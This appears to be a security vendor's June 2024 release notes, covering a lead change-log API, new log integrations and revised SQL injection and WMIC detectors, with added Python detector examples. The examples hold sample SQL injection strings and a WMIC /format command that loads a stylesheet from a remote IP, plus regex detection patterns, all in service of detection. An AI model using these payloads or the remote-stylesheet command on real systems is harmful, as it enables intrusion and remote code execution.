Note
This article was originally published on June 3, 2024.
Product updates
Lead Change Log API
You can now keep track of actions performed on your leads by using the new Lead Change Log API endpoint. This API includes detailed information such as assignee changes, status updates, and classification adjustments.
The Lead Change Log API’s key features:
Audit Tracking: Allows you to track changes for better programmatic audit purposes.
SOC Metrics Calculation: Facilitates the calculation of SOC metrics such as MTTR (Mean Time to Resolution) and MTTA (Mean Time to Acknowledge).
BI Tool Integration: Designed to integrate with BI tools to generate detailed SOC reports.
Use this new endpoint to pull lead change logs with increased granularity, thanks to an elaborate list of parameters allowing you to request data for specific events. You can request change logs of leads based on the lead risk level, lead status, lead source (the data type relating to the lead), lead assignee, and more.
We are confident that this new capability will greatly enhance your ability to manage and report on your security operations center activities.
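As an added example (not code from the product or its API), the MTTA/MTTR calculation described above, run over a constructed set of change-log records; the field names `lead_id`, `ts`, `field`, `old` and `new` are assumed for this illustration, not the endpoint's documented schema. Acknowledge is taken as the first assignee change, resolution as the first status change to Resolved.

```python
from datetime import datetime, timezone

# Constructed change-log records in the shape this example assumes: one record
# per action on a lead, with the field that changed and its old/new values.
CHANGE_LOG = [
    {"lead_id": "L-1", "ts": "2024-06-01T08:00:00Z", "field": "status",   "old": None,     "new": "Open"},
    {"lead_id": "L-1", "ts": "2024-06-01T08:10:00Z", "field": "assignee", "old": None,     "new": "alice"},
    {"lead_id": "L-1", "ts": "2024-06-01T09:00:00Z", "field": "status",   "old": "Open",   "new": "Resolved"},
    {"lead_id": "L-2", "ts": "2024-06-01T10:00:00Z", "field": "status",   "old": None,     "new": "Open"},
    {"lead_id": "L-2", "ts": "2024-06-01T10:30:00Z", "field": "assignee", "old": None,     "new": "bob"},
    {"lead_id": "L-2", "ts": "2024-06-01T10:40:00Z", "field": "risk",     "old": "Medium", "new": "High"},
    {"lead_id": "L-2", "ts": "2024-06-01T12:00:00Z", "field": "status",   "old": "Open",   "new": "Resolved"},
    {"lead_id": "L-3", "ts": "2024-06-01T11:00:00Z", "field": "status",   "old": None,     "new": "Open"},  # never picked up
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def lead_timelines(events):
    """Per lead: creation time, first assignee change, first transition to Resolved."""
    by_lead = {}
    for e in sorted(events, key=lambda e: e["ts"]):  # ISO timestamps sort lexically
        t = by_lead.setdefault(e["lead_id"], {"created": None, "acked": None, "resolved": None})
        ts = _ts(e["ts"])
        if t["created"] is None:
            t["created"] = ts
        if e["field"] == "assignee" and e["new"] and t["acked"] is None:
            t["acked"] = ts
        if e["field"] == "status" and e["new"] == "Resolved" and t["resolved"] is None:
            t["resolved"] = ts
    return by_lead

def soc_metrics(events):
    """MTTA/MTTR in minutes over leads that reached each milestone; the rest are counted, not averaged."""
    tl = lead_timelines(events)
    ack = [(t["acked"] - t["created"]).total_seconds() / 60 for t in tl.values() if t["acked"]]
    res = [(t["resolved"] - t["created"]).total_seconds() / 60 for t in tl.values() if t["resolved"]]
    return {
        "mtta_min": sum(ack) / len(ack) if ack else None,
        "mttr_min": sum(res) / len(res) if res else None,
        "unacknowledged": sum(1 for t in tl.values() if not t["acked"]),
        "open": sum(1 for t in tl.values() if not t["resolved"]),
    }

if __name__ == "__main__":
    print(soc_metrics(CHANGE_LOG))
```

Leads that were never acknowledged or never resolved are reported as counts rather than silently dragging the averages, which is the usual trap when the metric is computed straight from a BI tool.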
Integrations
JumpCloud Users
JumpCloud User Logs offer visibility into users within an organization's IT environment, capturing a snapshot of all of the users that exist in the JumpCloud system, along with their respective properties such as username, status, etc.
The new integration includes:
Ingestion of the data to the data lake
MOVEit
MOVEit Transfer is a secure managed file transfer (MFT) software developed by Ipswitch, a subsidiary of Progress Software Corporation. It is designed to provide organizations with a reliable, efficient, and secure way to transfer files, manage workflows, and ensure compliance with data security policies.
MOVEit Transfer logs provide detailed information on file transfer activities, user actions, and system events, capturing data such as source and destination, file size, transfer status, login and logout activities, IP addresses, and authentication methods.
The new integration includes:
Ingestion of the data to the data lake
Mapping the data to IOC Search
Trend Micro Deep Security
Trend Micro Deep Security is a comprehensive security solution designed to protect physical, virtual, cloud, and container environments. Trend Micro Deep Security logs provide detailed records of security-related events across protected environments, including physical, virtual, cloud, and container infrastructures.
The new integration includes:
Ingestion of the data to the data lake
Mapping the data to IOC Search
Detection
Modified detectors
Improvements to the Web application SQL injection attempt detector
TL;DR
The Web application SQL injection attempt detector logic was improved.
We have recently identified the Web application SQL injection attempt detector (web_server_sql_injection) as a low-fidelity detector.
As a result, we have decided to refactor this detector to no longer have group-by logic, and instead alert on each attempt individually. This change also allows custom scoring on all relevant fields such as request URI or user agent. We have also revised the conditions on which this detector fires, in order to reduce false positives and more accurately detect clear-cut SQL injection attempts.
Removed lead attributes:
uri_queries_count, referrers_count, total_duration_sec, stem_target_paths_count, uri_stem_count, user_agents_count, successful_requests_count, grid_array, query_target_paths_count, requests_count.
Added lead attributes:
server_port, server_username, response_win32_status, response_substatus, response_status, uri_stem_target_path, uri_query_target_path, action, http_method, referrer, request_uri, uri_query, uri_stem, client_request_host, client_ssl_protocol, server_ssl_protocol, user_agent, client_source_port
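To illustrate the per-attempt (no group-by) alerting and per-field scoring described above, here is an added example that is not the product's detector logic: a small detector run over constructed web server records whose keys follow the lead attributes listed above. The base score, the adjustments and the "sensitive uri_stem" rule are assumptions for the illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style web server records (not real customer data); keys
# follow the lead attributes listed above.
REQUESTS = [
    {"http_method": "GET", "uri_stem": "/products.asp", "uri_query": "id=42",
     "response_status": 200, "user_agent": "Mozilla/5.0", "client_request_host": "shop.example"},
    {"http_method": "GET", "uri_stem": "/products.asp", "uri_query": "id=42'+UNION+SELECT+1,2,3--",
     "response_status": 200, "user_agent": "sqlmap/1.8", "client_request_host": "shop.example"},
    {"http_method": "GET", "uri_stem": "/login.asp", "uri_query": "user=%27+OR+1%3D1--&pw=x",
     "response_status": 302, "user_agent": "Mozilla/5.0", "client_request_host": "shop.example"},
]

# Deliberately narrow: a UNION query, a tautology or a stacked DROP, not any lone quote.
SQLI = re.compile(r"(\bunion\b\s+(all\s+)?select\b|\bor\b\s+1\s*=\s*1\b|;\s*drop\s+table\b)", re.I)

def score(rec):
    """Base score for the attempt, then per-field adjustments an analyst could tune."""
    s = 50
    if rec["response_status"] in (200, 302):   # the application did not reject the request
        s += 20
    if rec["response_status"] >= 500:          # server error: the payload reached the backend
        s += 10
    if "sqlmap" in rec["user_agent"].lower():  # user_agent is scorable on its own now
        s += 20
    if rec["uri_stem"].endswith("login.asp"):  # assumed example of a sensitive uri_stem
        s += 10
    return min(s, 100)

def detect(records):
    """One lead per matching request (no group-by), carrying the raw fields for triage."""
    leads = []
    for rec in records:
        decoded = unquote_plus(rec["uri_query"])   # match on the decoded query, not the raw one
        if SQLI.search(decoded):
            leads.append({**rec, "uri_query_decoded": decoded, "score": score(rec)})
    return leads

if __name__ == "__main__":
    for lead in detect(REQUESTS):
        print(lead["score"], lead["uri_stem"], lead["uri_query_decoded"])
```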
Improvements to the Process execution through WMI detector
TL;DR
The Process execution through WMI detector logic was expanded to cover the execution of XSL scripts.
In an effort to expand our coverage in detecting the execution of XSL scripts, we decided to improve the Process execution through WMI detector (`edr_wmic_process_call_create_detector`). The detector will now also detect process execution using the WMI /format flag, which is used to execute XSL scripts.
As part of this improvement, we’ve excluded as many legitimate use cases as possible without risking missing suspicious events (i.e. without risking false negatives). We also adjusted the score to align better with our scoring system and lowered the default lead confidence level to Medium instead of High.
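An added example (not the product's detector) of the expanded logic: the original "process call create" condition plus the new /format branch, with the built-in format keywords and an allow-listed parent excluded so that only an external stylesheet fires. The EDR events, the allow-list entry and the field names are constructed for this illustration; the page does not list the real exclusions.

```python
import re

# Constructed EDR process-creation events (not real telemetry).
EVENTS = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": "cmd.exe",
     "cmdline": 'wmic process call create "calc.exe"'},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": "winword.exe",
     "cmdline": 'wmic os get /format:"http://198.51.100.7/a.xsl"'},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": "cmd.exe",
     "cmdline": "wmic os get /format:list"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": "inventory-agent.exe",
     "cmdline": r"wmic computersystem get /format:C:\ProgramData\Inventory\report.xsl"},
]

# Format keywords that ship with WMIC; these render output and load no user-supplied XSL.
BUILTIN_FORMATS = {"list", "table", "csv", "xml", "htable", "hform", "mof", "rawxml", "value", "texttable"}
PROCESS_CREATE = re.compile(r"process\s+call\s+create", re.I)
FORMAT_ARG = re.compile(r'/format:\s*"?([^\s"]+)', re.I)
# Assumed allow-list entry for a known inventory tool (hypothetical, for the example).
ALLOWED_PARENTS = {"inventory-agent.exe"}

def classify(ev):
    """Return (fires, reason) for one process-creation event."""
    if not ev["image"].lower().endswith(r"\wmic.exe"):
        return False, "not wmic"
    if PROCESS_CREATE.search(ev["cmdline"]):
        return True, "wmi process call create"
    m = FORMAT_ARG.search(ev["cmdline"])
    if not m:
        return False, "no /format"
    fmt = m.group(1)
    if fmt.lower() in BUILTIN_FORMATS:
        return False, "built-in format keyword"
    if ev["parent"].lower() in ALLOWED_PARENTS:
        return False, "allow-listed parent"
    return True, f"/format loads external stylesheet: {fmt}"

def detect(events):
    """Emit one lead per firing event at the lowered default confidence."""
    leads = []
    for ev in events:
        fires, reason = classify(ev)
        if fires:
            leads.append({**ev, "reason": reason, "confidence": "Medium"})
    return leads
```

The allow-list is keyed on the parent process rather than on the stylesheet path, so a renamed .xsl under the same tool still passes and an unexpected parent running the same command still fires.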
Deprecated detectors
🔎 Incomplete MFA challenge to AWS console
Detector ID: aws_web_console_mfa_challenge_without_login
As part of our ongoing initiative to improve detection quality, we have identified the "Incomplete MFA challenge to AWS console" detector as a low-fidelity detector.
Following the detector review, we have decided to deprecate it. This decision comes after careful consideration due to the detector’s low fidelity as an indicator of malicious attempts and because our analysis indicated that it does not reliably capture genuine security threats.